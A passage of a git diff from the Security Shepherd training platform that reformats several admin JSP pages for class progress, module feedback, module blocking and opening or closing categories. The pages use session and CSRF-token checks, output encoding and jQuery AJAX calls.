+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Could not open classList: " + e.toString());
+	showClasses = false;
+}
 %>
 <div id="formDiv" class="post">
-    <h1 class="title">Get Progress</h1>
-    <div class="entry">
-        <div id="badData"></div>
-        <form id="theForm" action="javascript:;">
-            <p>Select the class you would like to see the progress of</p>
-            <div id="badData"></div>
-            <input type="hidden" id="csrfToken" value="<%=csrfToken%>"/>
-            <table align="center">
-                <tr>
-                    <td><select id="classId">
-                        <option value=""></option>
-                        <%
-                            if (showClasses) {
-                                try {
-                                    do {
-                                        String classId = Encode.forHtmlAttribute(classList.getString(1));
-                                        String classYearName = Encode.forHtml(classList.getString(3)) + " " + Encode.forHtml(classList.getString(2));
-                        %>
-                        <option value="<%=classId%>"><%=classYearName%>
-                        </option>
-                        <%
-                                    }
-                                    while (classList.next());
-                                } catch (SQLException e) {
-                                    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Error occured when manipulating classList: " + e.toString());
-                                    showClasses = false;
-                                }
-                            }
-                        %>
-                    </select></td>
-                </tr>
-                <tr>
-                    <td align="center">
-                        <div id="submitButton">
-                            <input type="submit" value="Get Progress"/>
-                        </div>
-                        <div id="loadingSign" style="display: none;">
-                            <p>Loading...</p>
-                        </div>
-                    </td>
-                </tr>
-            </table>
-            <div id="resultDiv"></div>
-            <script>
-                $("#theForm").submit(function () {
-                    var theCsrfToken = $('#csrfToken').val();
-                    var theClass = $("#classId").val();
-                    //The Ajax Operation
-                    $("#badData").hide("fast");
-                    $("#loadingSign").show("slow");
-                    $("#submitButton").hide("fast");
-                    $("#resultDiv").hide("fast", function () {
-                        var ajaxCall = $.ajax({
-                            type: "POST",
-                            url: "getProgress",
-                            data: {
-                                classId: theClass,
-                                csrfToken: theCsrfToken
-                            },
-                            async: false
-                        });
-                        if (ajaxCall.status == 200) {
-                            $("#resultDiv").html(ajaxCall.responseText);
-                            $("#resultDiv").show("fast");
-                        } else {
-                            $("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
-                            $("#badData").show("slow");
-                        }
-                        $("#loadingSign").hide("fast", function () {
-                            $("#submitButton").show("slow");
-                        });
-                    });
-                });
-            </script>
-            <% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-            <% } %>
-        </form>
-    </div>
+	<h1 class="title">Get Progress</h1>
+	<div class="entry">
+		<div id="badData"></div>
+		<form id="theForm" action="javascript:;">
+			<p>Select the class you would like to see the progress of</p>
+			<div id="badData"></div>
+			<input type="hidden" id="csrfToken" value="<%=csrfToken%>" />
+			<table align="center">
+				<tr>
+					<td><select id="classId">
+							<option value=""></option>
+							<%
+									if(showClasses)
+														{
+															try
+															{
+																do
+																{
+																	String classId = Encode.forHtmlAttribute(classList.getString(1));
+																	String classYearName = Encode.forHtml(classList.getString(3)) + " " + Encode.forHtml(classList.getString(2));
+								%>
+							<option value="<%=classId%>"><%=classYearName%></option>
+							<%
+												}
+																			while(classList.next());
+																		}
+																		catch(SQLException e)
+																		{
+																			ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Error occured when manipulating classList: " + e.toString());
+																			showClasses = false;
+																		}
+																	}
+											%>
+					</select></td>
+				</tr>
+				<tr>
+					<td align="center">
+						<div id="submitButton">
+							<input type="submit" value="Get Progress" />
+						</div>
+						<div id="loadingSign" style="display: none;">
+							<p>Loading...</p>
+						</div>
+					</td>
+				</tr>
+			</table>
+			<div id="resultDiv"></div>
+			<script>					
+					$("#theForm").submit(function(){
+						var theCsrfToken = $('#csrfToken').val();
+						var theClass = $("#classId").val();
+						//The Ajax Operation
+						$("#badData").hide("fast");
+						$("#loadingSign").show("slow");
+						$("#submitButton").hide("fast");
+						$("#resultDiv").hide("fast", function(){
+							var ajaxCall = $.ajax({
+								type: "POST",
+								url: "getProgress",
+								data: {
+									classId: theClass,
+									csrfToken: theCsrfToken
+								},
+								async: false
+							});
+							if(ajaxCall.status == 200)
+							{
+								$("#resultDiv").html(ajaxCall.responseText);
+								$("#resultDiv").show("fast");
+							}
+							else
+							{
+								$("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
+								$("#badData").show("slow");
+							}
+							$("#loadingSign").hide("fast", function(){
+								$("#submitButton").show("slow");
+							});
+						});
+					});
+					</script>
+			<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+			<% } %>
+		</form>
+	</div>
 </div>
 <%
-        } else {
-            response.sendRedirect("../../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../../loggedOutSheep.html");
-    }
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
 %>
\ No newline at end of file
diff --git a/src/main/webapp/admin/moduleManagement/feedback.jsp b/src/main/webapp/admin/moduleManagement/feedback.jsp
index b2e4dc603..9a70bf70a 100644
--- a/src/main/webapp/admin/moduleManagement/feedback.jsp
+++ b/src/main/webapp/admin/moduleManagement/feedback.jsp
@@ -1,120 +1,132 @@
 <%@ page contentType="text/html; charset=iso-8859-1" language="java"
-         import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
-         errorPage="" %>
+	import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+	errorPage=""%>
 
 <%
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: feedback.jsp *************************");
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: feedback.jsp *************************");
 
 /**
  * This file is part of the Security Shepherd Project.
- *
+ * 
  * The Security Shepherd project is free software: you can redistribute it and/or modify
  * it under the terms of the GNU General Public License as published by
  * the Free Software Foundation, either version 3 of the License, or
  * (at your option) any later version.<br/>
- *
+ * 
  * The Security Shepherd project is distributed in the hope that it will be useful,
  * but WITHOUT ANY WARRANTY; without even the implied warranty of
  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  * GNU General Public License for more details.<br/>
- *
+ * 
  * You should have received a copy of the GNU General Public License
  * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
- *
+ * 
  * @author Mark Denihan
  */
-
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        Getter get = new Getter();
+ 
+if (request.getSession() != null)
+{
+HttpSession ses = request.getSession();
+Getter get = new Getter();
 //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(feedback.jsp): tokenCookie Error:" + htmlE.toString());
-        }
+Cookie tokenCookie = null;
+try
+{
+	tokenCookie = Validate.getToken(request.getCookies());
+}
+catch(Exception htmlE)
+{
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(feedback.jsp): tokenCookie Error:" + htmlE.toString());
+}
 // validateAdminSession ensures a valid session, and valid administrator credentials
 // Also, if tokenCookie != null, then the page is good to continue loading
 // Token is now validated when accessing admin pages to stop attackers causing other users to tigger logs of access attempts
-        Object tokenParmeter = request.getParameter("csrfToken");
-        if (Validate.validateAdminSession(ses, tokenCookie, tokenParmeter)) {
-            //Logging Username
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+Object tokenParmeter = request.getParameter("csrfToken");
+if(Validate.validateAdminSession(ses, tokenCookie, tokenParmeter))
+{
+	//Logging Username
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 // Getting Session Variables
 //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
 
-            String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
-            String ApplicationRoot = getServletContext().getRealPath("");
+String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
+String ApplicationRoot = getServletContext().getRealPath("");
 %>
 <div id="formDiv" class="post">
-    <h1 class="title">Get Module Feedback</h1>
-    <div class="entry">
-        <div id="badData"></div>
-        <form id="theForm" action="javascript:;">
-            <p>Select the module you would like to see the feedback from</p>
-            <div id="badData"></div>
-            <input type="hidden" id="csrfToken" value="<%= csrfToken %>"/>
-            <table align="center">
-                <tr>
-                    <td><select id="theModule" style="width: 300px">
-                        <option></option>
-                        <%= Getter.getModulesInOptionTags(ApplicationRoot) %>
-                    </select></td>
-                </tr>
-                <tr>
-                    <td align="center">
-                        <div id="submitButton">
-                            <input type="submit" value="Get Feedback"/>
-                        </div>
-                        <div id="loadingSign" style="display: none;">
-                            <p>Loading...</p>
-                        </div>
-                    </td>
-                </tr>
-            </table>
-            <div id="resultDiv"></div>
-            <script>
-                $("#theForm").submit(function () {
-                    var theCsrfToken = $('#csrfToken').val();
-                    var theModule = $("#theModule").val();
-                    //The Ajax Operation
-                    $("#badData").hide("fast");
-                    $("#submitButton").hide("fast");
-                    $("#loadingSign").show("slow");
-                    $("#resultDiv").hide("fast", function () {
-                        var ajaxCall = $.ajax({
-                            type: "POST",
-                            url: "getFeedback",
-                            data: {
-                                moduleId: theModule,
-                                csrfToken: theCsrfToken
-                            },
-                            async: false
-                        });
-                        if (ajaxCall.status == 200) {
-                            $("#resultDiv").html(ajaxCall.responseText);
-                            $("#resultDiv").show("fast");
-                        } else {
-                            $("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
-                            $("#badData").show("slow");
-                        }
-                    });
-                    $("#loadingSign").hide("fast", function () {
-                        $("#submitButton").show("slow");
-                    });
-                });
-            </script>
-            <% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-            <% } %>
-        </form>
-    </div>
+	<h1 class="title">Get Module Feedback</h1>
+	<div class="entry">
+		<div id="badData"></div>
+		<form id="theForm" action="javascript:;">
+			<p>Select the module you would like to see the feedback from</p>
+			<div id="badData"></div>
+			<input type="hidden" id="csrfToken" value="<%= csrfToken %>" />
+			<table align="center">
+				<tr>
+					<td><select id="theModule" style="width: 300px">
+							<option></option>
+							<%= Getter.getModulesInOptionTags(ApplicationRoot) %>
+					</select></td>
+				</tr>
+				<tr>
+					<td align="center">
+						<div id="submitButton">
+							<input type="submit" value="Get Feedback" />
+						</div>
+						<div id="loadingSign" style="display: none;">
+							<p>Loading...</p>
+						</div>
+					</td>
+				</tr>
+			</table>
+			<div id="resultDiv"></div>
+			<script>					
+					$("#theForm").submit(function(){
+						var theCsrfToken = $('#csrfToken').val();
+						var theModule = $("#theModule").val();
+						//The Ajax Operation
+						$("#badData").hide("fast");
+						$("#submitButton").hide("fast");
+						$("#loadingSign").show("slow");
+						$("#resultDiv").hide("fast", function(){
+							var ajaxCall = $.ajax({
+								type: "POST",
+								url: "getFeedback",
+								data: {
+									moduleId: theModule,
+									csrfToken: theCsrfToken
+								},
+								async: false
+							});
+							if(ajaxCall.status == 200)
+							{
+								$("#resultDiv").html(ajaxCall.responseText);
+								$("#resultDiv").show("fast");
+							}
+							else
+							{
+								$("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
+								$("#badData").show("slow");
+							}
+						});
+						$("#loadingSign").hide("fast", function(){
+							$("#submitButton").show("slow");
+						});
+					});
+					</script>
+			<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+			<% } %>
+		</form>
+	</div>
 </div>
 <%
-        } else {
-            response.sendRedirect("../../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../../loggedOutSheep.html");
-    }
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
 %>
\ No newline at end of file
diff --git a/src/main/webapp/admin/moduleManagement/moduleBlock.jsp b/src/main/webapp/admin/moduleManagement/moduleBlock.jsp
index 3548bd0bc..e8c73d4bc 100644
--- a/src/main/webapp/admin/moduleManagement/moduleBlock.jsp
+++ b/src/main/webapp/admin/moduleManagement/moduleBlock.jsp
@@ -1,175 +1,189 @@
 <%@ page contentType="text/html; charset=iso-8859-1" language="java"
-         import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
-         errorPage="" %>
+	import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+	errorPage=""%>
 
 <%
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: stopHere.jsp *************************");
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: stopHere.jsp *************************");
 
 /**
  * This file is part of the Security Shepherd Project.
- *
+ * 
  * The Security Shepherd project is free software: you can redistribute it and/or modify
  * it under the terms of the GNU General Public License as published by
  * the Free Software Foundation, either version 3 of the License, or
  * (at your option) any later version.<br/>
- *
+ * 
  * The Security Shepherd project is distributed in the hope that it will be useful,
  * but WITHOUT ANY WARRANTY; without even the implied warranty of
  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  * GNU General Public License for more details.<br/>
- *
+ * 
  * You should have received a copy of the GNU General Public License
  * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
- *
+ * 
  * @author Mark Denihan
  */
-
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        Getter get = new Getter();
+ 
+if (request.getSession() != null)
+{
+HttpSession ses = request.getSession();
+Getter get = new Getter();
 //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(stopHere.jsp): tokenCookie Error:" + htmlE.toString());
-        }
+Cookie tokenCookie = null;
+try
+{
+	tokenCookie = Validate.getToken(request.getCookies());
+}
+catch(Exception htmlE)
+{
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(stopHere.jsp): tokenCookie Error:" + htmlE.toString());
+}
 // validateAdminSession ensures a valid session, and valid administrator credentials
 // Also, if tokenCookie != null, then the page is good to continue loading
 // Token is now validated when accessing admin pages to stop attackers causing other users to tigger logs of access attempts
-        Object tokenParmeter = request.getParameter("csrfToken");
-        if (Validate.validateAdminSession(ses, tokenCookie, tokenParmeter)) {
-            //Logging Username
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+Object tokenParmeter = request.getParameter("csrfToken");
+if(Validate.validateAdminSession(ses, tokenCookie, tokenParmeter))
+{
+	//Logging Username
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 // Getting Session Variables
 //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
 
-            String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
-            String ApplicationRoot = getServletContext().getRealPath("");
+String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
+String ApplicationRoot = getServletContext().getRealPath("");
 %>
 <div id="formDiv" class="post">
-    <h1 class="title">Set a Module Blocker</h1>
-    <div class="entry">
+	<h1 class="title">Set a Module Blocker</h1>
+	<div class="entry">
 
-        <form id="theForm" action="javascript:;">
-            <p>
-                Selecting a module blocker will not allow users to take that
-                specific module. In a CTF environment this will stop them from
-                progress past this point until you disable it or enable it to a
-                further down the line module.<br/>
-                <br/> Select the module you would like to see the feedback from and
-                the message informing them when the blocker will be lifted.
-            </p>
-            <input type="hidden" id="csrfToken" value="<%= csrfToken %>"/>
-            <div id="enableBlockForm" align="center">
-                <table>
-                    <tr>
-                        <td>The Module To Block:</td>
-                        <td><select id="theModule" style="width: 300px">
-                            <%= Getter.getModulesInOptionTagsCTF(ApplicationRoot) %>
-                        </select></td>
-                    </tr>
-                    <tr>
-                        <td>Blocked Message to Give:</td>
-                        <td><textarea id="blockedMessage" maxlength="500"
-                                      style="width: 300px; height: 80px;"></textarea>
-                    </tr>
-                    <tr>
-                        <td colspan="2" align="center"><input type="submit"
-                                                              value="Enable Block" style="width: 150px; height: 25px;"/>
-                        </td>
-                    </tr>
-                </table>
-            </div>
-            <% if (ModuleBlock.blockerEnabled) { %>
-            <div id="removeModuleBlockDiv">
-                <h2 class="title">Remove Module Block</h2>
-                <p>Do you wish to remove the current module blocker? You can do
-                    this by clicking the following button;</p>
-                <a href="javascript:;" style="text-decoration: none;"
-                   id="removeModuleBlockButton" title="Remove Module Block">
-                    <div class="menuButton">Remove Module Block</div>
-                </a>
-            </div>
-            <% } %>
-            <br>
-            <div id="loadingSign" style="display: none;" class="menuButton">Loading...</div>
-            <div id="resultDiv" class="informationBox" style="display: none;"></div>
-            <div id="badData"></div>
+		<form id="theForm" action="javascript:;">
+			<p>
+				Selecting a module blocker will not allow users to take that
+				specific module. In a CTF environment this will stop them from
+				progress past this point until you disable it or enable it to a
+				further down the line module.<br />
+				<br /> Select the module you would like to see the feedback from and
+				the message informing them when the blocker will be lifted.
+			</p>
+			<input type="hidden" id="csrfToken" value="<%= csrfToken %>" />
+			<div id="enableBlockForm" align="center">
+				<table>
+					<tr>
+						<td>The Module To Block:</td>
+						<td><select id="theModule" style="width: 300px">
+								<%= Getter.getModulesInOptionTagsCTF(ApplicationRoot) %>
+						</select></td>
+					</tr>
+					<tr>
+						<td>Blocked Message to Give:</td>
+						<td><textarea id="blockedMessage" maxlength="500"
+								style="width: 300px; height: 80px;"></textarea>
+					</tr>
+					<tr>
+						<td colspan="2" align="center"><input type="submit"
+							value="Enable Block" style="width: 150px; height: 25px;" /></td>
+					</tr>
+				</table>
+			</div>
+			<% if(ModuleBlock.blockerEnabled){ %>
+			<div id="removeModuleBlockDiv">
+				<h2 class="title">Remove Module Block</h2>
+				<p>Do you wish to remove the current module blocker? You can do
+					this by clicking the following button;</p>
+				<a href="javascript:;" style="text-decoration: none;"
+					id="removeModuleBlockButton" title="Remove Module Block">
+					<div class="menuButton">Remove Module Block</div>
+				</a>
+			</div>
+			<% } %>
+			<br>
+			<div id="loadingSign" style="display: none;" class="menuButton">Loading...</div>
+			<div id="resultDiv" class="informationBox" style="display: none;"></div>
+			<div id="badData"></div>
 
-            <script>
-                $("#theForm").submit(function () {
-                    var theCsrfToken = $('#csrfToken').val();
-                    var theMessage = $("#blockedMessage").val();
-                    var theModule = $("#theModule").val();
-                    console.log("message: " + theMessage);
-                    //The Ajax Operation
-                    $("#badData").hide("fast");
-                    $("#resultDiv").hide("fast");
-                    $("#loadingSign").show("fast");
-                    $("#enableBlockForm").slideUp("fast", function () {
-                        var ajaxCall = $.ajax({
-                            type: "POST",
-                            url: "enableModuleBlock",
-                            data: {
-                                moduleId: theModule,
-                                blockedMessage: theMessage,
-                                csrfToken: theCsrfToken
-                            },
-                            async: false
-                        });
-                        $("#loadingSign").hide("fast", function () {
-                            if (ajaxCall.status == 200) {
-                                $("#resultDiv").html(ajaxCall.responseText);
-                                $("#resultDiv").show("fast");
-                            } else {
-                                $("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
-                                $("#badData").show("slow");
-                            }
-                            $("#enableBlockForm").slideDown("slow");
-                        });
-                    });
-                });
-                <% if(ModuleBlock.blockerEnabled){ %>
-                $("#removeModuleBlockButton").click(function () {
-                    var theCsrfToken = $('#csrfToken').val();
-                    //The Ajax Operation
-                    $("#badData").hide("fast");
-                    $("#resultDiv").hide("fast");
-                    $("#loadingSign").show("fast");
-                    $("#removeModuleBlockDiv").slideUp("fast", function () {
-                        var ajaxCall = $.ajax({
-                            type: "POST",
-                            url: "removeModuleLock",
-                            data: {
-                                csrfToken: theCsrfToken
-                            },
-                            async: false
-                        });
-                        $("#loadingSign").hide("fast", function () {
-                            if (ajaxCall.status == 200) {
-                                $("#resultDiv").html(ajaxCall.responseText);
-                                $("#resultDiv").show("fast");
-                            } else {
-                                $("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
-                                $("#badData").show("slow");
-                            }
-                            $("#removeModuleBlockDiv").slideDown("slow");
-                        });
-                    });
-                });
-                <% } %>
-            </script>
-            <% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-            <% } %>
-        </form>
-    </div>
+			<script>					
+					$("#theForm").submit(function(){
+						var theCsrfToken = $('#csrfToken').val();
+						var theMessage = $("#blockedMessage").val();
+						var theModule = $("#theModule").val();
+						console.log("message: " + theMessage);
+						//The Ajax Operation
+						$("#badData").hide("fast");
+						$("#resultDiv").hide("fast");
+						$("#loadingSign").show("fast");
+						$("#enableBlockForm").slideUp("fast", function(){
+							var ajaxCall = $.ajax({
+								type: "POST",
+								url: "enableModuleBlock",
+								data: {
+									moduleId: theModule,
+									blockedMessage: theMessage,
+									csrfToken: theCsrfToken
+								},
+								async: false
+							});
+							$("#loadingSign").hide("fast", function(){
+								if(ajaxCall.status == 200)
+								{
+									$("#resultDiv").html(ajaxCall.responseText);
+									$("#resultDiv").show("fast");
+								}
+								else
+								{
+									$("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
+									$("#badData").show("slow");
+								}
+								$("#enableBlockForm").slideDown("slow");
+							});
+						});
+					});
+					<% if(ModuleBlock.blockerEnabled){ %>
+						$("#removeModuleBlockButton").click(function(){
+							var theCsrfToken = $('#csrfToken').val();
+							//The Ajax Operation
+							$("#badData").hide("fast");
+							$("#resultDiv").hide("fast");
+							$("#loadingSign").show("fast");
+							$("#removeModuleBlockDiv").slideUp("fast", function(){
+								var ajaxCall = $.ajax({
+									type: "POST",
+									url: "removeModuleLock",
+									data: {
+										csrfToken: theCsrfToken
+									},
+									async: false
+								});
+								$("#loadingSign").hide("fast", function(){
+									if(ajaxCall.status == 200)
+									{
+										$("#resultDiv").html(ajaxCall.responseText);
+										$("#resultDiv").show("fast");
+									}
+									else
+									{
+										$("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
+										$("#badData").show("slow");
+									}
+									$("#removeModuleBlockDiv").slideDown("slow");
+								});
+							});
+						});
+					<% } %>
+					</script>
+			<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+			<% } %>
+		</form>
+	</div>
 </div>
 <%
-        } else {
-            response.sendRedirect("../../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../../loggedOutSheep.html");
-    }
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
 %>
\ No newline at end of file
diff --git a/src/main/webapp/admin/moduleManagement/openCloseByCategory.jsp b/src/main/webapp/admin/moduleManagement/openCloseByCategory.jsp
index f78d37a21..bce0448b7 100644
--- a/src/main/webapp/admin/moduleManagement/openCloseByCategory.jsp
+++ b/src/main/webapp/admin/moduleManagement/openCloseByCategory.jsp
@@ -1,168 +1,183 @@
 <%@ page contentType="text/html; charset=iso-8859-1" language="java"
-         import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
-         errorPage="" %>
+	import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+	errorPage=""%>
 
 <%
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: openCloseByCategory.jsp *************************");
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: openCloseByCategory.jsp *************************");
 
 /**
  * This file is part of the Security Shepherd Project.
- *
+ * 
  * The Security Shepherd project is free software: you can redistribute it and/or modify
  * it under the terms of the GNU General Public License as published by
  * the Free Software Foundation, either version 3 of the License, or
  * (at your option) any later version.<br/>
- *
+ * 
  * The Security Shepherd project is distributed in the hope that it will be useful,
  * but WITHOUT ANY WARRANTY; without even the implied warranty of
  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  * GNU General Public License for more details.<br/>
- *
+ * 
  * You should have received a copy of the GNU General Public License
  * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
- *
+ * 
  * @author Mark Denihan
  */
-
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        Getter get = new Getter();
+ 
+if (request.getSession() != null)
+{
+HttpSession ses = request.getSession();
+Getter get = new Getter();
 //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(openCloseByCategory.jsp): tokenCookie Error:" + htmlE.toString());
-        }
+Cookie tokenCookie = null;
+try
+{
+	tokenCookie = Validate.getToken(request.getCookies());
+}
+catch(Exception htmlE)
+{
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(openCloseByCategory.jsp): tokenCookie Error:" + htmlE.toString());
+}
 // validateAdminSession ensures a valid session, and valid administrator credentials
 // Also, if tokenCookie != null, then the page is good to continue loading
 // Token is now validated when accessing admin pages to stop attackers causing other users to tigger logs of access attempts
-        Object tokenParmeter = request.getParameter("csrfToken");
-        if (Validate.validateAdminSession(ses, tokenCookie, tokenParmeter)) {
-            //Logging Username
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+Object tokenParmeter = request.getParameter("csrfToken");
+if(Validate.validateAdminSession(ses, tokenCookie, tokenParmeter))
+{
+	//Logging Username
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 // Getting Session Variables
 //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
 
-            String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
-            String ApplicationRoot = getServletContext().getRealPath("");
+String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
+String ApplicationRoot = getServletContext().getRealPath("");
 %>
 <div id="formDiv" class="post">
-    <h1 class="title">Open and Close Levels</h1>
-    <div class="entry">
-        <form id="theForm" action="javascript:;">
-            <p>Use this form to open and close levels by entire categories.
-                Levels that are closed will not appear in any level listings.</p>
-            <input type="hidden" id="csrfToken" value="<%= csrfToken %>"/>
-            <div id="submitButton" align="center">
-                <div>
-                    <table>
-                        <tr>
-                            <td colspan="2"><%= Getter.getOpenCloseCategoryMenu(ApplicationRoot) %>
-                            </td>
-                        </tr>
-                        <tr>
-                            <td><input type="submit" value="Close Categories"></td>
-                            <td><input type="button" id="openCategories"
-                                       value="Open Categories"></td>
-                        </tr>
-                    </table>
-                </div>
-            </div>
-        </form>
-        <br>
-        <div id="resultDiv" style="display: none;" class="informationBox"></div>
-        <div id="loadingDiv" style="display: none;" class="menuButton">Loading...</div>
-        <div id="badData"></div>
-        <script>
-            $("#theForm").submit(function () {
-                //Get Data
-                var toDo = $("#toDo").val();
-                var theCsrfToken = $('#csrfToken').val();
-
-                //Show and Hide Stuff
-                $("#loadingDiv").show("fast");
-                $("#badData").hide("fast");
-                $("#resultDiv").hide("fast");
-                $("#submitButton").slideUp("fast", function () {
-                    //The Ajax Operation
-                    var ajaxCall = $.ajax({
-                        type: "POST",
-                        url: "openCloseModuleCategories",
-                        data: {
-                            toOpenOrClose: toDo,
-                            openOrClose: "closed",
-                            csrfToken: theCsrfToken
-                        },
-                        async: false
-                    });
-                    $("#loadingDiv").hide("fast", function () {
-                        if (ajaxCall.status == 200) {
-                            //Now output Result Div and Show
-                            $("#resultDiv").html(ajaxCall.responseText);
-                            $("#resultDiv").show("fast");
-                        } else {
-                            $("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
-                            $("#badData").show("slow");
-                        }
-                        console.log('Showing Form');
-                        $("#submitButton").slideDown("slow");
-                    });
-                });
-                var theRefreshError = "Could not Refresh Menu";
-                //Refresh the Side Menu
-                refreshSideMenu(theCsrfToken, theRefreshError);
-            });
-
-            $("#openCategories").click(function () {
-                var toDo = $("#toDo").val();
-                var theCsrfToken = $('#csrfToken').val();
-                //Show and Hide Stuff
-                $("#loadingDiv").show("fast");
-                $("#badData").hide("fast");
-                $("#resultDiv").hide("fast");
-                $("#submitButton").slideUp("fast", function () {
-                    //The Ajax Operation
-                    var ajaxCall = $.ajax({
-                        type: "POST",
-                        url: "openCloseModuleCategories",
-                        data: {
-                            toOpenOrClose: toDo,
-                            openOrClose: "open",
-                            csrfToken: theCsrfToken
-                        },
-                        async: false
-                    });
-                    $("#loadingDiv").hide("fast", function () {
